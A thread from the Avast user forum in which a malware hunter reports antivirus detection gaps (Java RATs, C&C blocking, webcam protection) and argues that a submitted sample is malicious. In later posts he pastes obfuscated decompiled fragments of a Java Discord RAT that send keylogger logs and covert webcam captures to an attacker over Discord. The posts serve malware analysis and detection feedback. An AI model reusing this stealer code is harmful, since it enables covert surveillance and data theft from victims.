Avast WEBforum
Consumer Products => Avast Free Antivirus / Premium Security (legacy Pro Antivirus, Internet Security, Premier) => Topic started by: McMcBrad on December 01, 2020, 03:09:56 PM
-
Hi,
I am a malware hunter and I've been experimenting with Avast recently.
It offers great malware protection, but I've noticed several glitches and areas of improvement:
Java Malware:
Avast is one of the few vendors blocking Java malware effectively, but real-time protection doesn't block *.jar files as soon as they are created. Unless you right-click-scan the item, malware gets blocked by IDP seconds after opening, even though there is a detection in definitions. This looks like a scanning glitch.
C&C Servers:
Avast hasn't developed technology that blocks connection to known C&C servers. Web Shield blocks dangerous downloads and phishing, but all other connections are allowed. This may be a great area of improvement.
I'm sure you have a database of known C&C servers and it won't be too hard for you to extract them from malware during analysis. It will boost your protection to unprecedented levels.
Correction:
There is an option for blocking known C&C servers is settings, but it doesn’t look very effective. I tried many RATs connecting mainly to domains *.hopto.org, some of them months old and they are still not blocked.
Ransomware Protection:
It would've been great to be able to select different modes for different folders, instead of just selecting one mode in general.
Extracting domains from malware and analysing relationships on VT might be a good idea.
Webcam Protection:
I was experimenting with NJRAT (downloading pre-built servers) and several times I had attackers connected. They could turn on my webcam, so I suggest you download some RATs and test/fix this.
Scripts, fileless malware:
This is a bit of a hit and miss (tends to be effective with minor exceptions). I suggest you have a look at tools, such as Invoke-Obfuscation Master as well as maldocs and develop generic methods to block downloaders and droppers, specially when they abuse common Windows processes (wscript, cscript and others) and are obfuscated.
Removal:
I noticed sometimes removed malware remains in memory (that happened with NJRAT servers again). I think the way you terminate processes should be improved.
Otherwise, due to the IDP I believe, you have great correlation and remove malware in their entirety, unlike many others. I tested your ability to remove scheduled tasks with malicious PowerShell code and you did great.
Firewall:
Firewall doesn't seem to scan programs for viruses before allowing them to connect, as on my test it allowed threats for which it had a detection. It would be a good idea not to allow known malware to connect, as well as maybe a "hardened mode", where all untrusted executables are blocked from connecting.
As a side note, I sent you some pretty interesting samples days ago and they are still undetected. I sent you a JPHP Coinminer and Python Stealer, which I discovered myself. At the time of sending, it had a very low detection (only Kaspersky, ZoneAlarm indirectly and one more). I was expecting you to take it more seriously, but there is no detection to date.
It could've made a great article.
GData analyst already published an article on the samples I discovered: https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp
-
Well that's interesting enough.
-
Which statement you find interesting?
-
Hi McMcBrad, welcome to the forum..!! :)
Just in case you need them, I'll add a few links...
• You can submit your feedback or a bug report in "About Avast". (Add a link to this thread)
• Submitting suggestions/ideas: https://forum.avast.com/index.php?topic=235975.0
• You can report a suspicious/malicious sample (File/Website) here: https://www.avast.com/report-malicious-file.php
• Avast Bug Bounty Program: https://www.avast.com/bug-bounty
PS: For the interested ones, see: https://malwaretips.com/threads/avast-premium-security-20-9.105149/
-
Using the link above I have submitted a Java Discord RAT (at the time of sending VT 1/58), almost 24 hours later, there is still no detection.
Although the C&C server is dead, I don't believe a program with the following code is safe.
FΑΚECRACKМЕΑААAAAΑАAА = new int[2];
KeyLoggerModule.FΑΚECRACKМЕΑААAAAΑАAА[0] = ((String)((Object)Dispatcher.bootstrap("get", 9L))).length();
KeyLoggerModule.FΑΚECRACKМЕΑААAAAΑАAА[1] = "".length();
while (true) {
DiscordUtils.sendMessage((Color)Color.GREEN, (String)((String)Dispatcher.bootstrap("get", 98784247905L) + Initializer.instance.UID + (String)Dispatcher.bootstrap("get", 29L)), (String)"", null, (MessageReceivedEvent)var2_2);
try {
var3_4 = new FileWriter(KeyLoggerHelper.logs);
var3_4.write(KeyLoggerHelper.text);
var3_4.close();
var2_2.getChannel().sendFile(KeyLoggerHelper.logs, new AttachmentOption[KeyLoggerModule.FΑΚECRACKМЕΑААAAAΑАAА[1]]).queue();
-
Please use "Insert Code", else the post can get blocked or removed. Thanks
Example for code...
yada yada yada
-
Please use "Insert Code", else the post can get blocked or removed. Thanks
Example for code...
yada yada yada
Thank you and thanks for welcoming me to the forum.
-
No problem, always good to see new smart/interested guys around. :)
-
Using the link above I have submitted a Java Discord RAT (at the time of sending VT 1/58), almost 24 hours later, there is still no detection.
Although the C&C server is dead, I don't believe a program with the following code is safe.
No detection on that code
https://www.virustotal.com/gui/file/9f6f061e9fab24e89bae2069089cce43cc1338d347779ce4722b6b70246b566e/detection
-
Using the link above I have submitted a Java Discord RAT (at the time of sending VT 1/58), almost 24 hours later, there is still no detection.
Although the C&C server is dead, I don't believe a program with the following code is safe.
No detection on that code
https://www.virustotal.com/gui/file/9f6f061e9fab24e89bae2069089cce43cc1338d347779ce4722b6b70246b566e/detection
There can be no detection on that code, as I have taken it out of context.
It comes from a program with no visible window that imports sarxos cam library and contains interesting modules you can see in the attachment.
This is the report of the program: https://www.virustotal.com/gui/file-analysis/MWM5N2UzOWU4OGJkZGZkY2UxZWIyNmE3OWYyYWEyNzM6MTYwNzE5NjIxMQ==/detection
The following code snippet saves camera image (obviously without your knowledge, as again, there is no visible window) and sends it to an attacker via discord:
File file = new File(Initializer.instance.Dir, (String)((Object)Dispatcher.bootstrap("get", 201863462934L)));
try {
webcam = Webcam.getDefault();
bl = webcam.isOpen();
}
catch (NullPointerException nullPointerException) {
DiscordUtils.sendMessage((Color)Color.RED, (String)((String)((Object)Dispatcher.bootstrap("get", 201863462935L)) + Initializer.instance.UID + (String)((Object)Dispatcher.bootstrap("get", 29L))), (String)((Object)Dispatcher.bootstrap("get", 201863462936L)), null, (MessageReceivedEvent)messageReceivedEvent);
return;
}
if (!bl) {
if (error == null) {
throw error;
}
webcam.open();
}
BufferedImage bufferedImage = webcam.getImage();
boolean bl2 = webcam.isOpen();
if (bl2) {
if (error == null) {
throw error;
}
webcam.close();
}
try {
ImageIO.write((RenderedImage)bufferedImage, (String)((Object)Dispatcher.bootstrap("get", 90194313235L)), file);
}
catch (IOException iOException) {
DiscordUtils.sendMessage((Color)Color.RED, (String)((String)((Object)Dispatcher.bootstrap("get", 201863462935L)) + Initializer.instance.UID + (String)((Object)Dispatcher.bootstrap("get", 29L))), (String)((Object)Dispatcher.bootstrap("get", 201863462937L)), null, (MessageReceivedEvent)messageReceivedEvent);
DiscordUtils.sendMessage((Color)Color.GREEN, (String)((String)((Object)Dispatcher.bootstrap("get", 201863462935L)) + Initializer.instance.UID + (String)((Object)Dispatcher.bootstrap("get", 29L))), (String)"", null, (MessageReceivedEvent)messageReceivedEvent);
messageReceivedEvent.getChannel().sendFile(file, new AttachmentOption[FАKЕСRАCКМΕAAΑAAААΑΑΑ[1]]).queue();
try {